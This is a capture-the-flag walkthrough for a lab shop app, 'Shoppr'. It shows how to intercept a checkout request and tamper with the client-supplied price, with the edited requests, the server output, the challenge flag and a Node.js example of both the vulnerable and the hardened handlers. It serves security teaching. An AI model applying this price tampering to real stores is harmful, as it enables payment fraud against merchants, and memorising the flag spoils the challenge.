HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Shoppr — Price Manipulation

Parameter Tampering · Client-Side Price Trust / Parameter Tampering
Difficulty: Intermediate
Vuln class: Client-Side Price Trust / Parameter Tampering
Steps: 4
// Objective
Intercept the Shoppr checkout request and modify the item price to $0.01, completing a $279 order for almost nothing.
// Tools required
Browser, Hackr Interceptor, Developer Tools
// Step-by-step walkthrough
1
Browse the Shoppr store
Open the Shoppr app and add a high-value item to your cart (the $279 item). Proceed to checkout. Open DevTools → Network tab before clicking "Pay Now".
2
Intercept the checkout request
Click "Pay Now" and catch the POST request to /api/checkout. The DevTools Network tab only shows the request once it has been sent (you can still copy it and replay an edited copy from the Console); the Hackr Interceptor tab lets you hold and edit it before it reaches the server.
Command / Input
POST /api/checkout
Content-Type: application/json

{"items":[{"id":"SKU-001","name":"Premium Headphones","qty":1,"price":27900}],"total":27900}
Prices are in cents: 27900 = $279.00. Both the per-item price and the total are supplied by the client, and the server accepts them as-is instead of looking the price up in its own database by item ID.
3
Modify the price in the Interceptor
If using the Hackr Interceptor, forward the request to Repeater. Change the price and total to 1 (= $0.01) and send.
Command / Input
POST /api/checkout
Content-Type: application/json

{"items":[{"id":"SKU-001","name":"Premium Headphones","qty":1,"price":1}],"total":1}
Output
{"status":"success","orderId":"ORD-8821","amountCharged":0.01}
The server charged $0.01 for a $279 item. It trusted the price field from the client instead of deriving the authoritative price server-side.
4
Retrieve the flag
After the order succeeds, the flag is shown on the order confirmation page.
Output
HackrGG{cl13nt_s1d3_pr1c3_trust_byp4ss}
The fix is simple: the server must look up the unit price from its own product database by item ID and recompute the total from that price and a validated quantity (a positive integer), never trusting a price or total sent by the client. If the client-sent total does not match the recomputed one, reject the order and log it: that mismatch is a reliable tampering signal.
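The whole procedure and its fix, as an added example that is not part of the hackr.gg walkthrough or the Shoppr app: a small Node.js model of /api/checkout, once as the vulnerable handler that charges the client-supplied total, and once hardened to derive every price from a server-side catalog. The catalog, the SKU-002 entry, the quantity cap and the function names are assumptions made for the example; the captured request is constructed to match step 2, and tamperPrices() applies the step 3 edit in code.

```javascript
// Added example (not code from the hackr.gg walkthrough or from Shoppr).
// Runs offline under Node.js; catalog and requests are constructed data.

// Hypothetical server-side product catalog, prices in cents.
const CATALOG = {
  "SKU-001": { name: "Premium Headphones", price: 27900 },
  "SKU-002": { name: "USB-C Cable", price: 1299 },
};

// The request captured in step 2 (constructed to match the walkthrough).
const CAPTURED_REQUEST = JSON.stringify({
  items: [{ id: "SKU-001", name: "Premium Headphones", qty: 1, price: 27900 }],
  total: 27900,
});

// Step 3, expressed as code: rewrite every client-supplied price to
// newPrice cents and make the total consistent with the new prices.
function tamperPrices(rawBody, newPrice = 1) {
  const body = JSON.parse(rawBody);
  for (const item of body.items) item.price = newPrice;
  body.total = body.items.reduce((sum, it) => sum + it.price * it.qty, 0);
  return JSON.stringify(body);
}

// Vulnerable handler: charges whatever "total" the client sent.
function checkoutVulnerable(rawBody) {
  const body = JSON.parse(rawBody);
  return { status: "success", amountChargedCents: body.total };
}

// Hardened handler: the only client inputs it honours are the SKU and
// the quantity; unit price and total come from CATALOG. A client-sent
// total that disagrees with the recomputed one is flagged as tampering
// so it can be logged and alerted on rather than silently corrected.
function checkoutHardened(rawBody) {
  const body = JSON.parse(rawBody);
  if (!Array.isArray(body.items) || body.items.length === 0) {
    return { status: "rejected", reason: "no items" };
  }
  let total = 0;
  for (const item of body.items) {
    const product = CATALOG[item.id];
    if (!product) return { status: "rejected", reason: `unknown SKU ${item.id}` };
    // Quantity must be a positive integer within a sane cap: negative or
    // fractional quantities are another way to drive the total down.
    if (!Number.isInteger(item.qty) || item.qty < 1 || item.qty > 100) {
      return { status: "rejected", reason: `bad qty for ${item.id}` };
    }
    total += product.price * item.qty;
  }
  const tampered = body.total !== undefined && body.total !== total;
  return { status: "success", amountChargedCents: total, tampered };
}

const tamperedBody = tamperPrices(CAPTURED_REQUEST);
console.log("vulnerable:", checkoutVulnerable(tamperedBody)); // charges 1 cent
console.log("hardened:  ", checkoutHardened(tamperedBody));   // charges 27900, tampered: true
```

Running it shows the vulnerable handler charging 1 cent for the tampered request while the hardened handler charges 27900 and reports tampered: true; the same hardened path rejects a negative quantity, which the walkthrough does not try but which the same missing server-side validation would otherwise allow.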
// Flag
Flag value
HackrGG{cl13nt_s1d3_pr1c3_trust_byp4ss}
Shown on the order confirmation page after a successful manipulated checkout.